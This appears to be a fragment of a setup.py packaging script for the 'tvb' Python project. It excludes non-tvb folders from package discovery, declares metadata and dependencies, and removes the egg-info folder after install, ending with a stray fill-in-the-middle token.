EXCLUDE_INTROSPECT_FOLDERS = [folder for folder in os.listdir(".")
if os.path.isdir(os.path.join(".", folder)) and folder != "tvb"]
setuptools.setup(name="tvb",
version=VERSION,
packages=setuptools.find_packages(exclude=EXCLUDE_INTROSPECT_FOLDERS),
license="GPL v2",
author=TVB_TEAM,
author_email='[email protected]',
include_package_data=True,
install_requires=TVB_INSTALL_REQUIREMENTS,
extras_require={'postgres': ["psycopg2"]})
## Clean after install
shutil.rmtree('tvb.egg-info', True)<|fim▁end|> |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.